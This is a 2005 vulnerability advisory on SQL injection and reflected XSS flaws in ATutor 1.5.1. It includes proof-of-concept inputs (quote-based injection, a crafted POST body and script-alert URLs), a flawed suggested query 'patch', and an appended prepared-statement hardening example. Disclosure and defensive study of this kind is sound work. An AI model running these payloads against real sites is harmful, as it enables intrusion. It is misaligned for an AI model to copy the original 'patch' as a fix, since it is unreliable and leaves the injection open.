ATutor-1.5.1 SQL injection and XSS bugs

2005-08-18T00:00:00
ID SECURITYVULNS:DOC:9507
Type securityvulns
Reporter Securityvulns
Modified 2005-08-18T00:00:00

Description

TITLE:

ATutor-1.5.1 SQL injection and XSS bugs

Severity:

Medium or even critical

SOFTWARE:

ATutor-1.5.1 http://www.atutor.ca/

DESCRIPTION:

ATutor-1.5.1 is a web-based education portal. The system is vulnerable to SQL injection and XSS attacks:

SQL injection:

http://localhost/tour/password_reminder.php - enter a single quote (') as the e-mail and you will get an error message

http://localhost/tour/registration.php - enter a single quote (') as the e-mail and you will get an error message

http://localhost/tour/registration.php - then use some kind of HTTP header editor and post this: login=1&password=1&password2=1&email=%27&lang=en&first_name=1&last_name=1&year=1&month=1&day=1&gender=m&address=1&postal=1&city=1&province=1&country=1&phone=1&website=http%3A%2F%2F&submit=%20Submit%20

XSS bugs:

http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>

http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages

http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search

->Patch<-

function valid_name($name) {
    // return FALSE if it contains characters which aren't on the specified list
    if (ereg('[^[:space:]a-zA-Z0-9_.-]{1,}', $name)) {
        return false;
    } else {
        return true;
    }
}

Copied from http://bg2.php.net/manual/en/function.eregi.php

OR

Open password_reminder.php and replace

$sql = "SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email='$_POST[form_email]'";

With

$sql = "SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE email=$_POST[form_email]'";

*This is only for password_reminder.php; for the others you are on your own
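The replacement line proposed above still builds the query from the raw POST value. As an added example that is not part of the advisory or of ATutor's code, here is a hardened version of the same password_reminder.php lookup using a mysqli prepared statement, a preg_match() equivalent of the valid_name() check (ereg() was deprecated in PHP 5.3 and removed in PHP 7), and output encoding for reflected parameters such as "course" and "words"; the $db connection, the TABLE_PREFIX constant and the mysqlnd driver (for get_result()) are assumed.

```php
<?php
// Added example, not ATutor code. Assumes a mysqli connection $db
// and the TABLE_PREFIX constant used by the original query.

// preg_match() equivalent of the advisory's valid_name(): reject any
// character outside whitespace, letters, digits, underscore, dot, hyphen.
function valid_name(string $name): bool
{
    // preg_match() returns 1 on match, 0 on no match, false on error;
    // only a clean "no match" (0) is accepted.
    return preg_match('/[^\sa-zA-Z0-9_.-]/', $name) === 0;
}

// Syntactic e-mail check, applied before the value reaches the database.
function valid_email(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Hardened lookup: the e-mail is bound as a parameter, so a quote in it
// is data, not SQL, and cannot change the statement.
function find_member_by_email(mysqli $db, string $email): ?array
{
    if (!valid_email($email)) {
        return null;
    }
    $sql = 'SELECT login, password, email FROM ' . TABLE_PREFIX
         . 'members WHERE email = ?';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null;           // do not echo $db->error to the user
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd
    $stmt->close();
    return $row ?: null;
}

// HTML-encode anything reflected into a page, e.g. the "course" and
// "words" parameters from login.php and search.php.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Usage in the handlers (hypothetical wiring):
// $row = find_member_by_email($db, $_POST['form_email'] ?? '');
// echo '<input name="words" value="' . h($_GET['words'] ?? '') . '">';
```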

Greets to all omega-team

                                                    Found by matrix_killer
